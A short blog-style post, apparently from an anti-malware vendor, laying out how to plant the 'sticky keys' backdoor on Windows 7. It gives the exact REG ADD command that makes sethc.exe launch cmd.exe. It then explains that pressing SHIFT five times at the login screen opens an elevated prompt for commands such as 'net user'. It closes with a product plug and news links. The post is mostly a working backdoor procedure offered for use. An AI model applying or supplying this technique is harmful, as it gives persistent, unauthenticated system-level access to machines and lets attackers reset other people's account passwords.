Reset Password Backdoor Vulnerability In Windows 7
- Log in to an administrator account.
- Run an Elevated Command Promptand insert following command in Command Prompt:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
- A message will be displayed: “The operation completed successfully.”
- Once at the login screen the next time, pressing SHIFT five times should launch the Elevated Command Prompt. From there, you can run commands (such as net user, etc.).
This shows record of the vulnerability and it is now documented!
Avoid vulnerabilities like this with Emsisoft Anti-Malware – get more details.
- Exploit allows any application to run on top of Windows 7 login screen (neowin.net)
- Windows 7 Exploit Allows Any Program To Run On Login Screen (redmondpie.com)